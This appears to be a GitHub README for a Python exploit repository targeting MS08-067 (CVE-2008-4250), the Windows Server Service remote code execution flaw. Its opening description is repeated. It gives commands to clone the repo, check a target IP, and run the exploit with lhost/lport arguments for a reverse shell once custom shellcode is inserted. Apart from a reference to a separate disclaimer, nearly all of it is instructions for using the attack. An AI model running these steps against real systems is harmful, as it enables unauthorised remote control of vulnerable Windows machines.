
This repository contains some python scripts implementation for the MS08-067 Windows Server Service vulnerability (CVE-2008-4250). This is a classic remote code execution vulnerability affecting older Windows systems.
This repository contains some python scripts implementation for the MS08-067 Windows Server Service vulnerability (CVE-2008-4250). This is a classic remote code execution vulnerability affecting older Windows systems.
First, open Shell or Cmd. And 👉 Run the following command:
git clone https://github.com/BinRacer/ms08-067.py.git
cd ms08-067.py
pip install -r requirements.txt
python src/ms08_067_check.py <target_ip>
# before use ms08_067_exploit.py, must replace shellcode in python file
python src/ms08_067_exploit.py <target_ip> <lhost> <lport>
For complete legal information and disclaimers, please refer to the Disclaimer document.